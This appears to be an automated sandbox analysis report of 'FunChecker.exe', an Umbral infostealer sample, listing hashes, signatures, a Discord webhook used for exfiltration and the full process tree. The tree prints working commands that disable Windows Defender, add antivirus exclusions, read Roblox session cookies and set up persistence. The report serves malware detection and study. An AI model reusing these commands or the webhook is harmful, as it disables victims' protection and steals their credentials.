Analysis
-
max time kernel
101s -
max time network
105s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
17-07-2024 18:36
General
-
Target
FunChecker.exe
-
Size
13.5MB
-
MD5
04accc794822e6da6b05da11cbd723a9
-
SHA1
1b3e53a762f991d0f2689cd34adb8c8b88e6b6e5
-
SHA256
98ffd90c72e22b5ce1783eeeebc424702e45398a7be1f3f9343beb7c87fc7977
-
SHA512
904a481079c978f3822ac230fd03d210f52acc91d92d8ef833c2274e1441e49c547cb563cd7125b65c1a06c62ee1ed2bc0f42643e56330eeb9a5d208eddec5fb
-
SSDEEP
393216:lXDyJgJ/LcGR1m6PH4xS8b+lpDLluOJYBowUt8/d:lDyJ2/LX1+E84DLwOJYBowI81
Malware Config
Extracted
umbral
https://discord.com/api/webhooks/1263163627955818638/O6H0XtkfVMlzt1CR2LtuxnT8hf_eK3rxCg4Z8Ho7QTiBTbC3moAh35BYkmVLUE-l4NEA
Signatures
-
Detect Umbral payload 3 IoCs
resource yara_rule behavioral1/memory/4528-44-0x0000000000400000-0x0000000000D68000-memory.dmp family_umbral behavioral1/memory/4528-45-0x0000000000400000-0x0000000000D68000-memory.dmp family_umbral behavioral1/memory/4528-1610-0x0000000000400000-0x0000000000D68000-memory.dmp family_umbral -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe -
Modifies security service 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ FunChecker.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ svchost.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Microsoft OneDrive.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ system32.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2908 powershell.exe 3812 powershell.exe 1088 powershell.exe 4208 powershell.exe 428 powershell.exe 4944 powershell.exe 944 powershell.exe 2324 powershell.exe 3996 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts svchost.exe -
Checks BIOS information in registry 2 TTPs 8 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Microsoft OneDrive.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Microsoft OneDrive.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion system32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion system32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion FunChecker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion FunChecker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion svchost.exe -
Drops startup file 4 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft OneDrive.lnk system32.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FunChecker.lnk Microsoft OneDrive.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FunChecker.lnk Microsoft OneDrive.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft OneDrive.lnk system32.exe -
Executes dropped EXE 3 IoCs
pid Process 4528 svchost.exe 4200 Microsoft OneDrive.exe 2988 system32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral1/memory/4900-12-0x0000000000400000-0x0000000001704000-memory.dmp themida behavioral1/memory/4900-13-0x0000000000400000-0x0000000001704000-memory.dmp themida behavioral1/files/0x000800000001ac40-24.dat themida behavioral1/files/0x000800000001ac41-29.dat themida behavioral1/files/0x000800000001ac43-40.dat themida behavioral1/memory/4528-44-0x0000000000400000-0x0000000000D68000-memory.dmp themida behavioral1/memory/4528-45-0x0000000000400000-0x0000000000D68000-memory.dmp themida behavioral1/memory/4200-47-0x0000000000400000-0x0000000000D22000-memory.dmp themida behavioral1/memory/4200-48-0x0000000000400000-0x0000000000D22000-memory.dmp themida behavioral1/memory/2988-51-0x0000000000400000-0x0000000000CE0000-memory.dmp themida behavioral1/memory/2988-52-0x0000000000400000-0x0000000000CE0000-memory.dmp themida behavioral1/memory/4528-1610-0x0000000000400000-0x0000000000D68000-memory.dmp themida behavioral1/memory/4900-2326-0x0000000000400000-0x0000000001704000-memory.dmp themida behavioral1/memory/4200-2335-0x0000000000400000-0x0000000000D22000-memory.dmp themida -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Software\Microsoft\Windows\CurrentVersion\Run\FunChecker = "C:\\Users\\Admin\\AppData\\Roaming\\FunChecker.exe" Microsoft OneDrive.exe Set value (str) \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft OneDrive = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft OneDrive" system32.exe -
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA FunChecker.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA svchost.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Microsoft OneDrive.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA system32.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 13 discord.com 14 discord.com -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 6 ip-api.com 11 ip-api.com -
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
pid Process 4900 FunChecker.exe 4528 svchost.exe 4200 Microsoft OneDrive.exe 2988 system32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Delays execution with timeout.exe 1 IoCs
pid Process 3608 timeout.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 4192 wmic.exe -
Modifies registry class 3 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP reg.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP reg.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP reg.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4296 schtasks.exe 2716 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 49 IoCs
pid Process 4900 FunChecker.exe 4900 FunChecker.exe 4528 svchost.exe 4528 svchost.exe 4200 Microsoft OneDrive.exe 4200 Microsoft OneDrive.exe 2988 system32.exe 2988 system32.exe 1088 powershell.exe 1088 powershell.exe 1088 powershell.exe 3952 powershell.exe 3952 powershell.exe 3952 powershell.exe 872 powershell.exe 872 powershell.exe 872 powershell.exe 4208 powershell.exe 428 powershell.exe 436 powershell.exe 428 powershell.exe 4208 powershell.exe 428 powershell.exe 436 powershell.exe 4208 powershell.exe 436 powershell.exe 944 powershell.exe 944 powershell.exe 2908 powershell.exe 944 powershell.exe 2908 powershell.exe 2908 powershell.exe 212 powershell.exe 212 powershell.exe 212 powershell.exe 2324 powershell.exe 2324 powershell.exe 2324 powershell.exe 3996 powershell.exe 3996 powershell.exe 3996 powershell.exe 3812 powershell.exe 3812 powershell.exe 3812 powershell.exe 4944 powershell.exe 4944 powershell.exe 4944 powershell.exe 4200 Microsoft OneDrive.exe 2988 system32.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4528 svchost.exe Token: SeDebugPrivilege 4200 Microsoft OneDrive.exe Token: SeDebugPrivilege 2988 system32.exe Token: SeDebugPrivilege 1088 powershell.exe Token: SeDebugPrivilege 3952 powershell.exe Token: SeDebugPrivilege 872 powershell.exe Token: SeDebugPrivilege 428 powershell.exe Token: SeDebugPrivilege 4208 powershell.exe Token: SeDebugPrivilege 436 powershell.exe Token: SeDebugPrivilege 944 powershell.exe Token: SeDebugPrivilege 2908 powershell.exe Token: SeIncreaseQuotaPrivilege 1088 wmic.exe Token: SeSecurityPrivilege 1088 wmic.exe Token: SeTakeOwnershipPrivilege 1088 wmic.exe Token: SeLoadDriverPrivilege 1088 wmic.exe Token: SeSystemProfilePrivilege 1088 wmic.exe Token: SeSystemtimePrivilege 1088 wmic.exe Token: SeProfSingleProcessPrivilege 1088 wmic.exe Token: SeIncBasePriorityPrivilege 1088 wmic.exe Token: SeCreatePagefilePrivilege 1088 wmic.exe Token: SeBackupPrivilege 1088 wmic.exe Token: SeRestorePrivilege 1088 wmic.exe Token: SeShutdownPrivilege 1088 wmic.exe Token: SeDebugPrivilege 1088 wmic.exe Token: SeSystemEnvironmentPrivilege 1088 wmic.exe Token: SeRemoteShutdownPrivilege 1088 wmic.exe Token: SeUndockPrivilege 1088 wmic.exe Token: SeManageVolumePrivilege 1088 wmic.exe Token: 33 1088 wmic.exe Token: 34 1088 wmic.exe Token: 35 1088 wmic.exe Token: 36 1088 wmic.exe Token: SeIncreaseQuotaPrivilege 1088 wmic.exe Token: SeSecurityPrivilege 1088 wmic.exe Token: SeTakeOwnershipPrivilege 1088 wmic.exe Token: SeLoadDriverPrivilege 1088 wmic.exe Token: SeSystemProfilePrivilege 1088 wmic.exe Token: SeSystemtimePrivilege 1088 wmic.exe Token: SeProfSingleProcessPrivilege 1088 wmic.exe Token: SeIncBasePriorityPrivilege 1088 wmic.exe Token: SeCreatePagefilePrivilege 1088 wmic.exe Token: SeBackupPrivilege 1088 wmic.exe Token: SeRestorePrivilege 1088 wmic.exe Token: SeShutdownPrivilege 1088 wmic.exe Token: SeDebugPrivilege 1088 wmic.exe Token: SeSystemEnvironmentPrivilege 1088 wmic.exe Token: SeRemoteShutdownPrivilege 1088 wmic.exe Token: SeUndockPrivilege 1088 wmic.exe Token: SeManageVolumePrivilege 1088 wmic.exe Token: 33 1088 wmic.exe Token: 34 1088 wmic.exe Token: 35 1088 wmic.exe Token: 36 1088 wmic.exe Token: SeIncreaseQuotaPrivilege 4744 wmic.exe Token: SeSecurityPrivilege 4744 wmic.exe Token: SeTakeOwnershipPrivilege 4744 wmic.exe Token: SeLoadDriverPrivilege 4744 wmic.exe Token: SeSystemProfilePrivilege 4744 wmic.exe Token: SeSystemtimePrivilege 4744 wmic.exe Token: SeProfSingleProcessPrivilege 4744 wmic.exe Token: SeIncBasePriorityPrivilege 4744 wmic.exe Token: SeCreatePagefilePrivilege 4744 wmic.exe Token: SeBackupPrivilege 4744 wmic.exe Token: SeRestorePrivilege 4744 wmic.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 4200 Microsoft OneDrive.exe 2988 system32.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4900 wrote to memory of 4800 4900 FunChecker.exe 73 PID 4900 wrote to memory of 4800 4900 FunChecker.exe 73 PID 4900 wrote to memory of 4800 4900 FunChecker.exe 73 PID 4800 wrote to memory of 864 4800 cmd.exe 76 PID 4800 wrote to memory of 864 4800 cmd.exe 76 PID 4800 wrote to memory of 864 4800 cmd.exe 76 PID 4900 wrote to memory of 4528 4900 FunChecker.exe 75 PID 4900 wrote to memory of 4528 4900 FunChecker.exe 75 PID 4900 wrote to memory of 4528 4900 FunChecker.exe 75 PID 4900 wrote to memory of 4200 4900 FunChecker.exe 77 PID 4900 wrote to memory of 4200 4900 FunChecker.exe 77 PID 4900 wrote to memory of 4200 4900 FunChecker.exe 77 PID 4900 wrote to memory of 2988 4900 FunChecker.exe 78 PID 4900 wrote to memory of 2988 4900 FunChecker.exe 78 PID 4900 wrote to memory of 2988 4900 FunChecker.exe 78 PID 4900 wrote to memory of 652 4900 FunChecker.exe 79 PID 4900 wrote to memory of 652 4900 FunChecker.exe 79 PID 4900 wrote to memory of 652 4900 FunChecker.exe 79 PID 4800 wrote to memory of 4560 4800 cmd.exe 81 PID 4800 wrote to memory of 4560 4800 cmd.exe 81 PID 4800 wrote to memory of 4560 4800 cmd.exe 81 PID 652 wrote to memory of 496 652 cmd.exe 82 PID 652 wrote to memory of 496 652 cmd.exe 82 PID 652 wrote to memory of 496 652 cmd.exe 82 PID 4800 wrote to memory of 3288 4800 cmd.exe 83 PID 4800 wrote to memory of 3288 4800 cmd.exe 83 PID 4800 wrote to memory of 3288 4800 cmd.exe 83 PID 4800 wrote to memory of 5052 4800 cmd.exe 84 PID 4800 wrote to memory of 5052 4800 cmd.exe 84 PID 4800 wrote to memory of 5052 4800 cmd.exe 84 PID 4800 wrote to memory of 5088 4800 cmd.exe 85 PID 4800 wrote to memory of 5088 4800 cmd.exe 85 PID 4800 wrote to memory of 5088 4800 cmd.exe 85 PID 4800 wrote to memory of 5056 4800 cmd.exe 86 PID 4800 wrote to memory of 5056 4800 cmd.exe 86 PID 4800 wrote to memory of 5056 4800 cmd.exe 86 PID 4800 wrote to memory of 5096 4800 cmd.exe 87 PID 4800 wrote to memory of 5096 4800 cmd.exe 87 PID 4800 wrote to memory of 5096 4800 cmd.exe 87 PID 4800 wrote to memory of 3680 4800 cmd.exe 88 PID 4800 wrote to memory of 3680 4800 cmd.exe 88 PID 4800 wrote to memory of 3680 4800 cmd.exe 88 PID 4800 wrote to memory of 4936 4800 cmd.exe 89 PID 4800 wrote to memory of 4936 4800 cmd.exe 89 PID 4800 wrote to memory of 4936 4800 cmd.exe 89 PID 4800 wrote to memory of 5116 4800 cmd.exe 90 PID 4800 wrote to memory of 5116 4800 cmd.exe 90 PID 4800 wrote to memory of 5116 4800 cmd.exe 90 PID 4800 wrote to memory of 4084 4800 cmd.exe 91 PID 4800 wrote to memory of 4084 4800 cmd.exe 91 PID 4800 wrote to memory of 4084 4800 cmd.exe 91 PID 4800 wrote to memory of 2912 4800 cmd.exe 92 PID 4800 wrote to memory of 2912 4800 cmd.exe 92 PID 4800 wrote to memory of 2912 4800 cmd.exe 92 PID 4800 wrote to memory of 2488 4800 cmd.exe 93 PID 4800 wrote to memory of 2488 4800 cmd.exe 93 PID 4800 wrote to memory of 2488 4800 cmd.exe 93 PID 4800 wrote to memory of 4204 4800 cmd.exe 94 PID 4800 wrote to memory of 4204 4800 cmd.exe 94 PID 4800 wrote to memory of 4204 4800 cmd.exe 94 PID 4800 wrote to memory of 4196 4800 cmd.exe 95 PID 4800 wrote to memory of 4196 4800 cmd.exe 95 PID 4800 wrote to memory of 4196 4800 cmd.exe 95 PID 4800 wrote to memory of 4704 4800 cmd.exe 96
Processes
-
C:\Users\Admin\AppData\Local\Temp\FunChecker.exe"C:\Users\Admin\AppData\Local\Temp\FunChecker.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4900 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\avdisable.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:4800 -
C:\Windows\SysWOW64\reg.exereg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:864
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f3⤵PID:4560
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f3⤵PID:3288
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f3⤵PID:5052
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:5088
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:5056
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:5096
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:3680
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:4936
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f3⤵PID:5116
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f3⤵PID:4084
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f3⤵PID:2912
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f3⤵PID:2488
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f3⤵PID:4204
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f3⤵PID:4196
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable3⤵PID:4704
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable3⤵PID:3548
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable3⤵PID:4348
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable3⤵PID:3024
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable3⤵PID:4552
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f3⤵PID:2824
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f3⤵PID:2996
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f3⤵
- Modifies registry class
PID:4316
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f3⤵
- Modifies registry class
PID:5016
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f3⤵
- Modifies registry class
PID:868
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f3⤵PID:4548
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f3⤵PID:2784
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f3⤵PID:1292
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f3⤵PID:4532
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f3⤵
- Modifies security service
PID:4860
-
-
-
C:\Users\Admin\AppData\Local\Temp\svchost.exe"C:\Users\Admin\AppData\Local\Temp\svchost.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Drivers directory
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4528 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\svchost.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1088
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 23⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3952
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:872
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:436
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic.exe" os get Caption3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1088
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4744
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵PID:2416
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER3⤵
- Suspicious behavior: EnumeratesProcesses
PID:212
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_VideoController get name3⤵
- Detects videocard installed
PID:4192
-
-
-
C:\Users\Admin\AppData\Local\Temp\Microsoft OneDrive.exe"C:\Users\Admin\AppData\Local\Temp\Microsoft OneDrive.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4200 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Microsoft OneDrive.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:428
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Microsoft OneDrive.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:944
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\FunChecker.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2324
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'FunChecker.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3812
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "FunChecker" /tr "C:\Users\Admin\AppData\Roaming\FunChecker.exe"3⤵
- Scheduled Task/Job: Scheduled Task
PID:4296
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /delete /f /tn "FunChecker"3⤵PID:660
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp25A4.tmp.bat""3⤵PID:192
-
C:\Windows\SysWOW64\timeout.exetimeout 34⤵
- Delays execution with timeout.exe
PID:3608
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\system32.exe"C:\Users\Admin\AppData\Local\Temp\system32.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2988 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\system32.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4208
-
-
